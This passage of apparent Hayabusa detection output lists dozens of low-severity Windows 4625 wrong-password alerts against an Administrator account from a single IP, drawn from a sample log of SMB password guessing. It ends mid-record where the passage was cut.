2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R1RozAr1uhux4cYW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7EmuUSv03RnhKsF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jw410HEW8EC3MC9f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UTYp8cEbt3Yggo3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWJVzgYLWIo7SGCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DP13jPdW5Gdl8z56 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LNXOWjHmMDhfFVon | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kka1RiF3f7Nhkf8x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2o90lG6attzWU4ZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PyPK9kuJdflQ4RKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a9I3El7d7anR0kIz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eDUMTEfNhFuuqMle | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e0F70d1WstkqnQgA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bm0txApQSp1U42N3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JeEe5ENSIZnfc3FG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oasE54Z1FlpswY0d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bhje1BgvxOlG28JM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9iTIv4UQ4En9RA2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mg8KFm1lCeImj8Sb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h17Fz1s6GJki61jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Pjjn4FAkJn4h32r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARVx3FAAww8Gmfvc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sYIwPg5k1wpvWobN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0sfhYQ54SjC4JTX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nfZYnUPV40FShcqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XYbvWVCT0tFixZTH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XC6Vmz0ql8myDuGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.854 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:49.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:49.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.247 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.444 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:50.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:50.828 